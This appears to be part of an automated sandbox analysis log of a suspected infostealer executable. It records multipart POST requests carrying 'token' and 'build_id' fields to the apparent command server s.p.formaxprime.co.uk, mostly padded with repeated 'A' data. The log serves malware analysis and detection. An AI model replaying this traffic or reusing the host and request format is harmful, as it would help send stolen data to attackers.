                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.44976878.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:25 UTC274OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----trieukfct00zmyusjmym
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 131557
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 74 72 69 65 75 6b 66 63 74 30 30 7a 6d 79 75 73 6a 6d 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 74 72 69 65 75 6b 66 63 74 30 30 7a 6d 79 75 73 6a 6d 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 74 72 69 65 75 6b 66 63 74 30 30 7a 6d 79 75 73 6a 6d 79 6d 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------trieukfct00zmyusjmymContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------trieukfct00zmyusjmymContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------trieukfct00zmyusjmymCont
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:25 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:27 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.44976978.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:28 UTC275OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----4oh4wt2nozmgv3o8y5pp
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
